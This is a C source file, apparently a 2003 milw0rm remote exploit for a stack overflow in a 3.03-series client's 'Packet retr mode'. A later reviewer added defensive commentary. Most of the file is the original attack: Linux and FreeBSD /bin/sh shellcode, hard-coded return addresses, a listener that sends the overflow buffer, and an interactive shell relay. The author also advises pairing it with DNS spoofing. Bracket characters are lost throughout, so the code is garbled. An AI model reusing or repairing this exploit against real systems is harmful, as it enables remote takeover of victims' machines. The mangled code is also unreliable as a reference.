/*
 * NOTE(review): historical (January 2003) proof-of-concept for a stack-based
 * buffer overflow in the "Packet retr mode" of a 3.03-series client.  The
 * product name is redacted ("email protected") throughout this copy.
 *
 * This copy does not compile as shown: bracket characters appear to have
 * been lost during extraction (string-initialised "char" scalars,
 * "targetsi", "argv0", "snd1024", "&buffer(...)").  It is kept here as a
 * reference artefact only; the tokens below are reproduced exactly.
 *
 * Defender's summary of what the code does: the program is a LISTENER.  It
 * binds a port (80 by default), waits for one inbound connection, sends a
 * single buffer of 0x41 filler + platform shellcode + two hard-coded stack
 * addresses, then relays an interactive shell over the same socket.  Every
 * table row depends on a fixed return address, i.e. on a predictable,
 * executable stack; address-space randomisation, stack canaries and
 * non-executable stacks each defeat the technique.  The EXEC/EXEC2 strings
 * and the 0x41 filler are usable as detection artefacts; a process crashing
 * with 0x41414141 in EBP/EIP is the signature of its -d mode.
 *
 * Original author header follows unchanged.
 */
/* email protected exploit by zillionatsafemode.org (2003/01/07)
   Credits for the vulnerability go to: SkyLined <email protected>
   http://spoor12.edup.tudelft.nl/SkyLined%20v4.2/?Advisories/email protected
   Use this exploit in combination with a DNS spoofing utility such as the one
   provided in the Dsniff package. http://naughty.monkey.org/~dugsong/dsniff/ */

#include <unistd.h>
#include <sys/stat.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <errno.h>
#include <stdio.h>
/* NOTE(review): <stdlib.h> is not included, so malloc(), atoi() and exit()
 * are called without prototypes (implicit declaration, pre-C99 behaviour). */

#define NOP 0x41   /* filler byte ('A'); -d also writes 0x41414141 into the saved EBP/EIP slots */
#define EXEC "TERM=xterm; export TERM=xterm;exec /bin/sh -i"   /* first line sent to the spawned shell */
#define EXEC2 "id;uname -a;"                                   /* second line sent; its output is echoed to the operator */

/* Payload for the Linux rows (num 0-3).  The author's own labels split it
 * into a "dup" prologue and an "execve /bin/sh" body; bytes reproduced as
 * found.  NOTE(review): declared as a scalar char in this copy (see header). */
char linux_shellcode =
    /* dup */
    "\x31\xc9\x31\xc0\x31\xdb\xb3\x04\xb0\x3f\xcd\x80\xfe\xc1\xb0"
    "\x3f\xcd\x80\xfe\xc1\xb0\x3f\xcd\x80"
    /* execve /bin/sh */
    "\x31\xdb\x31\xc9\xf7\xe3\x53\x68\x6e\x2f\x73\x68\x68\x2f\x2f"
    "\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80";

/* Payload for the FreeBSD row (num 4); the author left it unannotated. */
char freebsd_shellcode =
    "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb1\x03\xbb\xff\xff\xff\xff"
    "\xb2\x04\x43\x53\x52\xb0\x5a\x50\xcd\x80\x80\xe9\x01\x75\xf3"
    "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f"
    "\x62\x69\x6e\x89\xe3\x50\x53\x50\x54\x53"
    "\xb0\x3b\x50\xcd\x80";

/* Fifteen 0x90 bytes appended after the shellcode when the row's junk
 * field is 1 (the author's comment in main() calls this countering
 * "buffer manipulation"). */
char static_crap = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";

/* One row of the target table printed by usage() and selected with -t. */
struct target {
    int num;            /* display index only; -t indexes the table by position */
    char *description;  /* platform label; NULL marks the end of the table */
    char *versions;     /* client builds the author lists for this row */
    char *type;         /* vulnerable mode; every row says "Packet retr mode" */
    char *shellcode;    /* payload copied into the tail of the buffer */
    long retaddress;    /* hard-coded stack address written into the saved EBP/EIP slots */
    int bufsize;        /* total size of the buffer sent (520 for every row) */
    int offset;         /* subtracted from retaddress in main(); the -o option does not feed this field */
    int junk;           /* 1: append static_crap to the shellcode; only the value 1 is tested in main() */
};

/* NOTE(review): the array declarator is missing in this copy.  Row 5 is the
 * NULL sentinel that ends the usage() listing; its retaddress of 0 also makes
 * main() skip buffer construction if it is selected. */
struct target targets = {
    {0, "Linux 2.2.* ", "3.03.i386 linux-gnu-gnulibc2.1 ", "Packet retr mode", linux_shellcode, 0xbffff420, 520, 500, 0},
    {1, "Linux 2.4.* ", "3.03 i386/i686 linux-gnu-gnulibc2.1 ", "Packet retr mode", linux_shellcode, 0xbffff390, 520, 500, 1},
    {2, "Linux 2.* ", "3.03.i386/i686 linux-gnulibc1-static", "Packet retr mode", linux_shellcode, 0xbffff448, 520, 500, 1},
    {3, "All above ", "3.03.i386 linux* ", "Packet retr mode", linux_shellcode, 0xbffff448, 520, 300, 1},
    {4, "FreeBSD ", "3.03.i386 FreeBSD-2.2.8 ", "Packet retr mode", freebsd_shellcode, 0x0004956c, 520, 1, 2},
    {5, NULL, NULL, NULL, NULL, 0, 0, 0}
};

/*
 * Bind a TCP listener on every local interface at `port`, accept exactly one
 * connection and return the connected descriptor.  Exits the process when
 * socket() or bind() fails.  NOTE(review): listen() and accept() results are
 * not checked, the listening socket is never closed, `cliAddr` is unused and
 * `servAddr.sin_zero` is left uninitialised.
 */
int open_socket(int port)
{
    int sock,fd;
    struct sockaddr_in cliAddr, servAddr;

    sock = socket(AF_INET, SOCK_STREAM, 0);
    if(sock<0) {
        printf("Error: Cannot open socket \n");
        exit(1);
    }

    /* bind server port */
    servAddr.sin_family = AF_INET;
    servAddr.sin_addr.s_addr = htonl(INADDR_ANY);
    servAddr.sin_port = htons(port);
    if(bind(sock, (struct sockaddr *) &servAddr, sizeof(servAddr))<0) {
        printf("Error: Cannot bind to port %d \n",port);
        exit(1);
    }

    listen(sock,5);
    fd=accept(sock,0,0);   /* blocks until a peer connects; main() writes to this fd */
    return fd;
}

/* Print the option summary and the target table, then exit(0). */
void usage(char *progname)
{
    int i;

    printf("\n---------------------------------------------------");
    printf("\n *- email protected remote exploit by zillion (s-m0de) -*");
    printf("\n---------------------------------------------------");
    printf("\n\nDefault : %s -h <target host>",progname);
    printf("\nTarget : %s -t <number>",progname);
    printf("\nOffset : %s -o <offset>",progname);
    printf("\nPort : %s -p <port>\n",progname);
    printf("\nDebug : %s -d \n",progname);
    printf("\nAvailable types:\n");
    printf("---------------------------------------------------\n");

    /* Walk the table until the NULL-description sentinel. */
    for(i = 0; targetsi.description; i++) {
        fprintf(stdout, "%d\t%s\t%s\t%s\n", targetsi.num, targetsi.description,targetsi.versions,targetsi.type);
    }
    printf("\n\n");
    exit(0);
}

/*
 * Relay between the operator's terminal and the connected socket once the
 * payload has run.  Sends EXEC, reads and discards 7 bytes (presumably an
 * initial prompt -- not verifiable from this file), sends EXEC2, then loops
 * on select(2) copying stdin to the socket and socket output to stdout.
 * Returns 0 when the peer closes the connection, 1 when read() fails.
 * NOTE(review): `rset` is never FD_ZERO()ed before use, select()'s result is
 * ignored, fgets()'s result is ignored (EOF on stdin is not detected, so
 * the loop appears to spin), and `test` is unused.
 */
int sh(int sockfd)
{
    char snd1024, rcv1024;   /* NOTE(review): the array sizes have collapsed into the names in this copy */
    fd_set rset;
    int maxfd, n,test;

    strcpy(snd, EXEC "\n");
    write(sockfd, snd, strlen(snd));
    read(sockfd,rcv,7);
    fflush(stdout);
    strcpy(snd, EXEC2 "\n");
    write(sockfd, snd, strlen(snd));

    /* Main command loop */
    for (;;) {
        FD_SET(fileno(stdin), &rset);
        FD_SET(sockfd, &rset);
        maxfd = ( ( fileno(stdin) > sockfd )?fileno(stdin):sockfd ) + 1;
        select(maxfd, &rset, NULL, NULL, NULL);

        if (FD_ISSET(fileno(stdin), &rset)) {
            bzero(snd, sizeof(snd));
            fgets(snd, sizeof(snd)-2, stdin);
            write(sockfd, snd, strlen(snd));
        }
        if (FD_ISSET(sockfd, &rset)) {
            bzero(rcv, sizeof(rcv));
            if ((n = read(sockfd, rcv, sizeof(rcv))) == 0) {
                /* exit */
                return 0;   /* peer closed the connection */
            }
            if (n < 0) {
                perror("read");
                return 1;
            }
            /* Relies on the bzero() above for NUL termination; a read that
             * fills the whole array leaves none. */
            fputs(rcv, stdout);
            fflush(stdout);
        }
    } /* for(;;) */
}

/*
 * Entry point.  Parses -d/-o/-p/-t (the 'h' and 'l' letters are in the
 * getopt string but have no case, so they fall through to usage()), builds
 * the buffer for the selected table row, then listens, sends it twice
 * newline-terminated and drops into sh().
 *
 * Buffer layout for a row with retaddress != 0, as the code below lays it out:
 *   NOP filler, then the row's shellcode (plus static_crap when junk == 1)
 *   ending 8 bytes before bufsize, then the saved-EBP slot at bufsize-8
 *   (retaddress - offset, or 0xbfbff654 for the FreeBSD row) and the
 *   saved-EIP slot at bufsize-4 (retaddress - offset).  -d overwrites both
 *   slots with 0x41414141 so a crash is unmistakable.
 *
 * NOTE(review): the local `offset` filled by -o is never read (the table's
 * own offset field is used); `buffer` is assigned only inside the
 * retaddress != 0 branch, yet the write() after open_socket() always runs;
 * the buffer is sent with strlen(), and nothing in its layout guarantees a
 * zero byte within bufsize; `retaddress`, `rcv200` and `i` are unused.
 */
int main(int argc, char **argv){
    char *buffer,*tmp;
    long retaddress;
    char rcv200;
    int fd,i,arg,debug=0,type=0,port=80,offset=250;

    if(argc < 2) {
        usage(argv0);
    }

    while ((arg = getopt (argc, argv, "dh:o:l:p:t:")) != -1){
        switch (arg){
            case 'd':
                debug = 1;
                break;
            case 'o':
                offset = atoi(optarg);
                break;
            case 'p':
                port = atoi(optarg);
                break;
            case 't':
                type = atoi(optarg);
                break;
            default :
                usage(argv0);
        }
    }

    /* NOTE(review): `type` is used as a table index without a range check;
     * "targetstype" is the collapsed form of that indexed access. */
    if((targetstype.retaddress) != 0) {
        buffer = (char *)malloc((targetstype.bufsize));

        /* some junk may be required to counter buffer manipulation */
        if(targetstype.junk == 1) {
            tmp = (char *)malloc(strlen(static_crap) + strlen(targetstype.shellcode));
            strcpy(tmp,targetstype.shellcode);
            strcat(tmp,static_crap);
            targetstype.shellcode = tmp;   /* the table row itself is rewritten */
        }

        memset(buffer,NOP,targetstype.bufsize);
        memcpy(buffer + (targetstype.bufsize) - (strlen(targetstype.shellcode) + 8) ,targetstype.shellcode,strlen(targetstype.shellcode));

        /* Overwrite EBP and EIP */
        *(long *)&buffer(targetstype.bufsize) - 8 = (targetstype.retaddress - targetstype.offset);

        // If freebsd we need to place a value without 00 in ebp
        if(type == 4) {
            *(long *)&buffer(targetstype.bufsize) - 8 = 0xbfbff654;
        }
        *(long *)&buffer(targetstype.bufsize) - 4 = (targetstype.retaddress - targetstype.offset);

        /* Debug mode (-d): overwrite the EBP and EIP slots with 41414141.
         * (The author's comment said "uncomment"; the -d flag controls it.) */
        if(debug == 1) {
            *(long *)&buffer(targetstype.bufsize) - 8 = 0x41414141;
            *(long *)&buffer(targetstype.bufsize) - 4 = 0x41414141;
        }
    }

    fd = open_socket(port);
    write(fd,buffer,strlen(buffer));
    write(fd,"\n",1);
    write(fd,"\n",1);
    sleep(1);   /* give the peer a moment before the relay starts reading */
    sh(fd);
    close(fd);
    return 0;
}

// milw0rm.com 2003-04-08